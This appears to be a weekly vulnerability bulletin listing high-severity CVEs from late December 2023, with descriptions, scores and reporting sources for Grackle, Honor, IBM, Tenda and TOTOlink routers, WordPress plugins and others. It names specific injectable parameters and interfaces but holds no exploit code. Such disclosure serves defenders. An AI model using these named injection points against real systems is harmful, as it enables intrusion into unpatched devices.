grackle — grackle Grackle is a GraphQL server written in functional Scala, built on the Typelevel stack. The GraphQL specification requires that GraphQL fragments must not form cycles, either directly or indirectly. Prior to Grackle version 0.18.0, that requirement wasn’t checked, and queries with cyclic fragments would have been accepted for type checking and compilation. The attempted compilation of such fragments would result in a JVM `StackOverflowError` being thrown. Some knowledge of an applications GraphQL schema would be required to construct such a query, however no knowledge of any application-specific performance or other behavioural characteristics would be needed. Grackle uses the cats-parse library for parsing GraphQL queries. Prior to version 0.18.0, Grackle made use of the cats-parse `recursive` operator. However, `recursive` is not currently stack safe. `recursive` was used in three places in the parser: nested selection sets, nested input values (lists and objects), and nested list type declarations. Consequently, queries with deeply nested selection sets, input values or list types could be constructed which exploited this, causing a JVM `StackOverflowException` to be thrown during parsing. Because this happens very early in query processing, no specific knowledge of an applications GraphQL schema would be required to construct such a query. The possibility of small queries resulting in stack overflow is a potential denial of service vulnerability. This potentially affects all applications using Grackle which have untrusted users. Both stack overflow issues have been resolved in the v0.18.0 release of Grackle. As a workaround, users could interpose a sanitizing layer in between untrusted input and Grackle query processing. 2023-12-22 7.5 CVE-2023-50730
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
honor — com.hihonor.phoneservice Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 7 CVE-2023-51431
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os     Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file overwrite the correct system file 2023-12-29 7.3 CVE-2023-23436
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_ui Some Honor products are affected by buffer overflow vulnerability, successful exploitation could cause code execution. 2023-12-29 9.3 CVE-2023-51434
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_ui Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause information leak. 2023-12-29 7.1 CVE-2023-51435
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — nth-an00 Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file overwrite the correct system file. 2023-12-29 7.3 CVE-2023-23431
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — nth-an00 Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file overwrite the correct system file. 2023-12-29 7.3 CVE-2023-23432
3836d913-7555-4dd0-a509-f5667fdf5fe4
ibm — aspera_console IBM Aspera Console 3.4.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 210322. 2023-12-25 7.2 CVE-2021-38927
psirt@us.ibm.com
psirt@us.ibm.com
ibm — financial_transaction_manager_for_swift_services In the Message Entry and Repair (MER) facility of IBM Financial Transaction Manager for SWIFT Services 3.2.4 the sending address and the message type of FIN messages are assumed to be immutable. However, an attacker might modify these elements of a business transaction. IBM X-Force ID: 273183. 2023-12-25 7.5 CVE-2023-49880
psirt@us.ibm.com
psirt@us.ibm.com
ibm — i Facsimile Support for IBM i 7.2, 7.3, 7.4, and 7.5 could allow a local user to gain elevated privileges due to an unqualified library call. A malicious actor could cause arbitrary code to run with the privilege of the user invoking the facsimile support. IBM X-Force ID: 267689. 2023-12-25 7 CVE-2023-43064
psirt@us.ibm.com
psirt@us.ibm.com
ibm — planning_analytics IBM Planning Analytics Local 2.0 could allow a remote attacker to upload arbitrary files, caused by the improper validation of file extensions. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious script, which could allow the attacker to execute arbitrary code on the vulnerable system. IBM X-Force ID: 265567. 2023-12-22 9.8 CVE-2023-42017
psirt@us.ibm.com
psirt@us.ibm.com
iteachyou — dreamer_cms A vulnerability was found in Dreamer CMS 4.1.3. It has been declared as problematic. This vulnerability affects unknown code of the file /upload/uploadFile. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-248938 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-24 8.8 CVE-2023-7091
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kashipara — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtUser’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49688
help@fluidattacks.com
help@fluidattacks.com
kashipara — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘JobId’ parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49689
help@fluidattacks.com
help@fluidattacks.com
libaom — libaom Increasing the resolution of video frames, while performing a multi-threaded encode, can result in a heap overflow in av1_loop_restoration_dealloc(). 2023-12-27 9 CVE-2023-6879
cve-coordination@google.com
cve-coordination@google.com
lychee — lychee Lychee is a free photo-management tool. Prior to 5.0.2, Lychee is vulnerable to an SQL injection on any binding when using mysql/mariadb. This injection is only active for users with the `.env` settings set to DB_LOG_SQL=true and DB_LOG_SQL_EXPLAIN=true. The defaults settings of Lychee are safe. The patch is provided on version 5.0.2. To work around this issue, disable SQL EXPLAIN logging. 2023-12-28 8.8 CVE-2023-52082
security-advisories@github.com
security-advisories@github.com
mattermost — mattermost Mattermost version 2.10.0 and earlier fails to sanitize deeplink paths, which allows an attacker to perform CSRF attacks against the server. 2023-12-29 7.1 CVE-2023-7114
responsibledisclosure@mattermost.com
micropython — micropython A vulnerability was found in MicroPython up to 1.21.0. It has been classified as critical. Affected is the function slice_indices of the file objslice.c. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.22.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-249180. 2023-12-29 7.3 CVE-2023-7158
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
microsoft — visual_studio Visual Studio Code Python Extension Remote Code Execution Vulnerability 2023-12-29 7.8 CVE-2020-17163
secure@microsoft.com
mindsdb — mindsdb
 		 MindsDB is a SQL Server for artificial intelligence. Prior to version 23.11.4.1, the `put` method in `mindsdb/mindsdb/api/http/namespaces/file.py` does not validate the user-controlled name value, which is used in a temporary file name, which is afterwards opened for writing on lines 122-125, which leads to path injection. Later in the method, the temporary directory is deleted on line 151, but since we can write outside of the directory using the path injection vulnerability, the potentially dangerous file is not deleted. Arbitrary file contents can be written due to `f.write(chunk)` on line 125. Mindsdb does check later on line 149 in the `save_file` method in `file-controller.py` which calls the `_handle_source` method in `file_handler.py` if a file is of one of the types `csv`, `json`, `parquet`, `xls`, or `xlsx`. However, since the check happens after the file has already been written, the files will still exist (and will not be removed due to the path injection described earlier), just the `_handle_source` method will return an error. The same user-controlled source source is used also in another path injection sink on line 138. This leads to another path injection, which allows an attacker to delete any `zip` or `tar.gz` files on the server. 2023-12-22 9.1 CVE-2023-50731
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
misskey — misskey Misskey is an open source, decentralized social media platform. Third-party applications may be able to access some endpoints or Websocket APIs that are incorrectly specified as [kind](https://github.com/misskey-dev/misskey/blob/406b4bdbe79b5b0b68fcdcb3c4b6e419460a0258/packages/backend/src/server/api/endpoints.ts#L811) or [secure](https://github.com/misskey-dev/misskey/blob/406b4bdbe79b5b0b68fcdcb3c4b6e419460a0258/packages/backend/src/server/api/endpoints.ts#L805) without the user’s permission and perform operations such as reading or adding non-public content. As a result, if the user who authenticated the application is an administrator, confidential information such as object storage secret keys and SMTP server passwords will be leaked, and general users can also create invitation codes without permission and leak non-public user information. This is patched in version [2023.12.1](https://github.com/misskey-dev/misskey/commit/c96bc36fedc804dc840ea791a9355d7df0748e64). 2023-12-29 9 CVE-2023-52139
security-advisories@github.com
security-advisories@github.com
misskey — misskey Nexkey is a lightweight fork of Misskey v12 optimized for small to medium size servers. Prior to 12.23Q4.5, Nexkey allows external apps using tokens issued by administrators and moderators to call admin APIs. This allows malicious third-party apps to perform operations such as updating server settings, as well as compromise object storage and email server credentials. This issue has been patched in 12.23Q4.5. 2023-12-27 8.9 CVE-2023-52077
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
moxa — iologik_e1210_firmware A Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user. 2023-12-23 8.8 CVE-2023-5961
psirt@moxa.com
mp3gain — mp3gain A stack buffer overflow vulnerability in MP3Gain v1.6.2 allows an attacker to cause a denial of service via the WriteMP3GainAPETag function at apetag.c:592. 2023-12-22 7.5 CVE-2023-49356
cve@mitre.org
netentsec — ns-asg_application_security_gateway A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file index.php?para=index of the component Login. The manipulation of the argument check_VirtualSiteId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249183. 2023-12-29 7.3 CVE-2023-7161
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
open_design_alliance — oda_drawings_sdk An issue was discovered in Open Design Alliance Drawings SDK before 2024.12. A corrupted value of number of sectors used by the Fat structure in a crafted DGN file leads to an out-of-bounds write. An attacker can leverage this vulnerability to execute code in the context of the current process. 2023-12-26 7.8 CVE-2023-5180
8a9629cb-c5e7-4d2a-a894-111e8039b7ea
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). Malicious code could be executed in the File Manager section. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 7.5 CVE-2023-41815
security@pandorafms.com
pexip — pexip_infinity Pexip Infinity before 31.2 has Improper Input Validation for signalling, allowing remote attackers to trigger an abort. 2023-12-25 7.5 CVE-2023-31289
cve@mitre.org
pexip — pexip_infinity Pexip Infinity before 31.2 has Improper Input Validation for RTCP, allowing remote attackers to trigger an abort. 2023-12-25 7.5 CVE-2023-31455
cve@mitre.org
phpgurukul — hospital_management_system A vulnerability, which was classified as critical, has been found in PHPGurukul Hospital Management System 1.0. Affected by this issue is some unknown functionality of the component Admin Dashboard. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249356. 2023-12-30 7.3 CVE-2023-7172
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul — nipah_virus_testing_management_system A vulnerability, which was classified as critical, has been found in PHPGurukul Nipah Virus Testing Management System 1.0. This issue affects some unknown processing of the file bwdates-report-result.php. The manipulation of the argument fromdate leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248951. 2023-12-25 9.8 CVE-2023-7099
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user/signup.php. The manipulation leads to weak password requirements. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248740. 2023-12-22 8.8 CVE-2023-7053
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul — restaurant_table_booking_system A vulnerability, which was classified as critical, was found in PHPGurukul Restaurant Table Booking System 1.0. Affected is an unknown function of the file /admin/bwdates-report-details.php. The manipulation of the argument fdate leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248952. 2023-12-25 9.8 CVE-2023-7100
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
poly — multiple_products A vulnerability, which was classified as critical, has been found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. This issue affects some unknown processing of the component Diagnostic Telnet Mode. The manipulation leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The identifier VDB-249257 was assigned to this vulnerability. 2023-12-29 7.2 CVE-2023-4464
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
red_hat — jboss_enterprise_application_platform
 		 A flaw was found in EAP-7 during deserialization of certain classes, which permits instantiation of HashMap and HashTable with no checks on resources consumed. This issue could allow an attacker to submit malicious requests using these classes, which could eventually exhaust the heap and result in a Denial of Service. 2023-12-27 7.5 CVE-2023-3171
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
revanced — revanced ReVanced API proxies requests needed to feed the ReVanced Manager and website with data. Up to and including commit 71f81f7f20cd26fd707335bca9838fa3e7df20d2, ReVanced API lacks error caching causing rate limit to be triggered thus increasing server load. This causes a denial of service for all users using the API. It is recommended to implement proper error caching. 2023-12-27 7.5 CVE-2023-52075
security-advisories@github.com
signalwire — freeswitch FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.11, when handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP. To address this vulnerability, upgrade FreeSWITCH to 1.10.11 which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check. 2023-12-27 7.5 CVE-2023-51443
security-advisories@github.com
security-advisories@github.com
sourcecodester — simple_student_attendance_system A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument page leads to path traversal: ‘../filedir’. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248749 was assigned to this vulnerability. 2023-12-22 9.8 CVE-2023-7058
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
talent_software — ecop Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Talent Software ECOP allows Command Line Execution through SQL Injection. This issue affects ECOP: before 32255. 2023-12-28 7.5 CVE-2023-4671
iletisim@usom.gov.tr
tenda — m3_firmware Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow via the function formGetWeiXinConfig. 2023-12-26 9.8 CVE-2023-51090
cve@mitre.org
tenda — m3_firmware Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow via the function R7WebsSecurityHandler. 2023-12-26 9.8 CVE-2023-51091
cve@mitre.org
tenda — m3_firmware Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow via the function upgrade. 2023-12-26 9.8 CVE-2023-51092
cve@mitre.org
tenda — m3_firmware Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow via the function fromSetLocalVlanInfo. 2023-12-26 9.8 CVE-2023-51093
cve@mitre.org
tenda — m3_firmware Tenda M3 V1.0.0.12(4856) was discovered to contain a Command Execution vulnerability via the function TendaTelnet. 2023-12-26 9.8 CVE-2023-51094
cve@mitre.org
tenda — m3_firmware Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow via the function formDelWlRfPolicy. 2023-12-26 9.8 CVE-2023-51095
cve@mitre.org
tenda — w9_firmware Tenda W9 V1.0.0.7(4456)_CN was discovered to contain a stack overflow via the function formSetAutoPing. 2023-12-26 9.8 CVE-2023-51097
cve@mitre.org
tenda — w9_firmware Tenda W9 V1.0.0.7(4456)_CN was discovered to contain a command injection vulnerability via the function formSetDiagnoseInfo . 2023-12-26 9.8 CVE-2023-51098
cve@mitre.org
tenda — w9_firmware Tenda W9 V1.0.0.7(4456)_CN was discovered to contain a command injection vulnerability via the function formexeCommand . 2023-12-26 9.8 CVE-2023-51099
cve@mitre.org
tenda — w9_firmware Tenda W9 V1.0.0.7(4456)_CN was discovered to contain a command injection vulnerability via the function formGetDiagnoseInfo . 2023-12-26 9.8 CVE-2023-51100
cve@mitre.org
tenda — w9_firmware Tenda W9 V1.0.0.7(4456)_CN was discovered to contain a stack overflow via the function formSetUplinkInfo. 2023-12-26 9.8 CVE-2023-51101
cve@mitre.org
tenda — w9_firmware Tenda W9 V1.0.0.7(4456)_CN was discovered to contain a stack overflow via the function formWifiMacFilterSet. 2023-12-26 9.8 CVE-2023-51102
cve@mitre.org
tj-actions — tj-actions tj-actions/changed-files is a Github action to retrieve all files and directories. Prior to 41.0.0, the `tj-actions/changed-files` workflow allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets. This issue may lead to arbitrary command execution in the GitHub Runner. This vulnerability has been addressed in version 41.0.0. Users are advised to upgrade. 2023-12-27 7.3 CVE-2023-51664
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
tj-actions — tj-actions The [`tj-actions/verify-changed-files`](https://github.com/tj-actions/verify-changed-files) action allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets. The [`verify-changed-files`](https://github.com/tj-actions/verify-changed-files) workflow returns the list of files changed within a workflow execution. This could potentially allow filenames that contain special characters such as `;` which can be used by an attacker to take over the [GitHub Runner](https://docs.github.com/en/actions/using-github-hosted-runners/about-github-hosted-runners) if the output value is used in a raw fashion (thus being directly replaced before execution) inside a `run` block. By running custom commands, an attacker may be able to steal secrets such as `GITHUB_TOKEN` if triggered on other events than `pull_request`. This has been patched in versions [17](https://github.com/tj-actions/verify-changed-files/releases/tag/v17) and [17.0.0](https://github.com/tj-actions/verify-changed-files/releases/tag/v17.0.0) by enabling `safe_output` by default and returning filename paths escaping special characters for bash environments. 2023-12-29 7.7 CVE-2023-52137
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
totolink — a3700r_firmware There is an arbitrary command execution vulnerability in the setDiagnosisCfg function of the cstecgi .cgi of the TOTOlink A3700R router device in its firmware version V9.1.2u.5822_B20200513. 2023-12-22 9.8 CVE-2023-50147
cve@mitre.org
totolink — a7100ru A vulnerability, which was classified as critical, has been found in Totolink A7100RU 7.4cu.2313_B20191024. Affected by this issue is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument flag leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248942 is the identifier assigned to this vulnerability. 2023-12-25 9.8 CVE-2023-7095
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink — ex1200l_firmware TOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi setOpModeCfg interface. 2023-12-22 9.8 CVE-2023-51033
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanPriDns parameter’ of the setLanConfig interface of the cstecgi .cgi 2023-12-22 9.8 CVE-2023-51011
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanGateway parameter’ of the setLanConfig interface of the cstecgi .cgi. 2023-12-22 9.8 CVE-2023-51012
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanNetmask parameter’ of the setLanConfig interface of the cstecgi .cgi. 2023-12-22 9.8 CVE-2023-51013
cve@mitre.org
totolink — ex1800t_firmware TOTOLINK EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanSecDns parameter’ of the setLanConfig interface of the cstecgi .cgi 2023-12-22 9.8 CVE-2023-51014
cve@mitre.org
totolink — ex1800t_firmware TOTOLINX EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the ‘enable parameter’ of the setDmzCfg interface of the cstecgi .cgi 2023-12-22 9.8 CVE-2023-51015
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the setRebootScheCfg interface of the cstecgi .cgi. 2023-12-22 9.8 CVE-2023-51016
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanIp parameter’ of the setLanConfig interface of the cstecgi .cgi. 2023-12-22 9.8 CVE-2023-51017
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘opmode’ parameter of the setWiFiApConfig interface of the cstecgi .cgi. 2023-12-22 9.8 CVE-2023-51018
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘key5g’ parameter of the setWiFiExtenderConfig interface of the cstecgi .cgi. 2023-12-22 9.8 CVE-2023-51019
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘langType’ parameter of the setLanguageCfg interface of the cstecgi .cgi. 2023-12-22 9.8 CVE-2023-51020
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘merge’ parameter of the setRptWizardCfg interface of the cstecgi .cgi. 2023-12-22 9.8 CVE-2023-51021
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘langFlag’ parameter of the setLanguageCfg interface of the cstecgi .cgi. 2023-12-22 9.8 CVE-2023-51022
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the ‘host_time’ parameter of the NTPSyncWithHost interface of the cstecgi .cgi. 2023-12-22 9.8 CVE-2023-51023
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘tz’ parameter of the setNtpCfg interface of the cstecgi .cgi. 2023-12-22 9.8 CVE-2023-51024
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to an unauthorized arbitrary command execution in the ‘admuser’ parameter of the setPasswordCfg interface of the cstecgi .cgi. 2023-12-22 9.8 CVE-2023-51025
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘hour’ parameter of the setRebootScheCfg interface of the cstecgi .cgi. 2023-12-22 9.8 CVE-2023-51026
cve@mitre.org
totolink — ex1800t_firmware TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘apcliAuthMode’ parameter of the setWiFiExtenderConfig interface of the cstecgi .cgi. 2023-12-22 9.8 CVE-2023-51027
cve@mitre.org
totolink — ex1800t_firmware TOTOLINK EX1800T 9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the apcliChannel parameter of the setWiFiExtenderConfig interface of the cstecgi.cgi. 2023-12-22 9.8 CVE-2023-51028
cve@mitre.org
wasmer — wasmer Wasmer is a WebAssembly runtime that enables containers to run anywhere: from Desktop to the Cloud, Edge and even the browser. Wasm programs can access the filesystem outside of the sandbox. Service providers running untrusted Wasm code on Wasmer can unexpectedly expose the host filesystem. This vulnerability has been patched in version 4.2.4. 2023-12-22 8.4 CVE-2023-51661
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
ween_software — admin_panel Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Ween Software Admin Panel allows SQL Injection. This issue affects Admin Panel: through 20231229.  NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-29 9.8 CVE-2023-4541
iletisim@usom.gov.tr
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in David F. Carr RSVPMaker. This issue affects RSVPMaker: from n/a through 10.6.6. 2023-12-29 10 CVE-2023-25054
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Shabti Kaplan Frontend Admin by DynamiApps. This issue affects Frontend Admin by DynamiApps: from n/a through 3.18.3. 2023-12-29 10 CVE-2023-51411
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Bertha.Ai BERTHA AI. Your AI co-pilot for WordPress and Chrome. This issue affects BERTHA AI. Your AI co-pilot for WordPress and Chrome: from n/a through 1.11.10.7. 2023-12-29 10 CVE-2023-51419
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Jacques Malgrange Rencontre – Dating Site. This issue affects Rencontre – Dating Site: from n/a through 3.10.1. 2023-12-29 10 CVE-2023-51468
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Pixelemu TerraClassifieds – Simple Classifieds Plugin. This issue affects TerraClassifieds – Simple Classifieds Plugin: from n/a through 2.0.3. 2023-12-29 10 CVE-2023-51473
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in IOSS WP MLM SOFTWARE PLUGIN. This issue affects WP MLM SOFTWARE PLUGIN: from n/a through 4.0. 2023-12-29 10 CVE-2023-51475
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in realmag777 Active Products Tables for WooCommerce. Professional products tables for WooCommerce store. This issue affects Active Products Tables for WooCommerce. Professional products tables for WooCommerce store: from n/a through 1.0.6. 2023-12-29 10 CVE-2023-51505
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Milan Dini? Rename Media Files. This issue affects Rename Media Files: from n/a through 1.0.1. 2023-12-29 9.9 CVE-2023-32095
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Kanban for WordPress Kanban Boards for WordPress. This issue affects Kanban Boards for WordPress: from n/a through 2.5.21. 2023-12-29 9.1 CVE-2023-40606
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in POSIMYTH Nexter Extension. This issue affects Nexter Extension: from n/a through 2.0.3. 2023-12-29 9.1 CVE-2023-45751
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in TienCOP WP EXtra. This issue affects WP EXtra: from n/a through 6.2. 2023-12-29 9.9 CVE-2023-46623
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Qode Interactive Qode Essential Addons. This issue affects Qode Essential Addons: from n/a through 1.5.2. 2023-12-29 9.9 CVE-2023-47840
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Brainstorm Force Astra Pro. This issue affects Astra Pro: from n/a through 4.3.1. 2023-12-29 9.9 CVE-2023-49830
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Support Plugin. This issue affects JS Help Desk – Best Help Desk & Support Plugin: from n/a through 2.8.1. 2023-12-28 9.3 CVE-2023-50839
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in WPVibes WP Mail Log. This issue affects WP Mail Log: from n/a through 1.1.2. 2023-12-29 9.9 CVE-2023-51410
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Piotnet Piotnet Forms. This issue affects Piotnet Forms: from n/a through 1.0.25. 2023-12-29 9 CVE-2023-51412
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in EnvialoSimple EnvíaloSimple: Email Marketing y Newsletters. This issue affects EnvíaloSimple: Email Marketing y Newsletters: from n/a through 2.1. 2023-12-29 9.6 CVE-2023-51414
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Joris van Montfort JVM Gutenberg Rich Text Icons. This issue affects JVM Gutenberg Rich Text Icons: from n/a through 1.2.3. 2023-12-29 9.9 CVE-2023-51417
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Soft8Soft LLC Verge3D Publishing and E-Commerce. This issue affects Verge3D Publishing and E-Commerce: from n/a through 4.5.2. 2023-12-29 9.1 CVE-2023-51420
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Soft8Soft LLC Verge3D Publishing and E-Commerce. This issue affects Verge3D Publishing and E-Commerce: from n/a through 4.5.2. 2023-12-29 9.9 CVE-2023-51421
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Saleswonder Team Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition. This issue affects Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition: from n/a through 3.05.0. 2023-12-29 9.9 CVE-2023-51422
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Jacques Malgrange Rencontre – Dating Site. This issue affects Rencontre – Dating Site: from n/a through 3.11.1. 2023-12-29 9.9 CVE-2023-51470
audit@patchstack.com
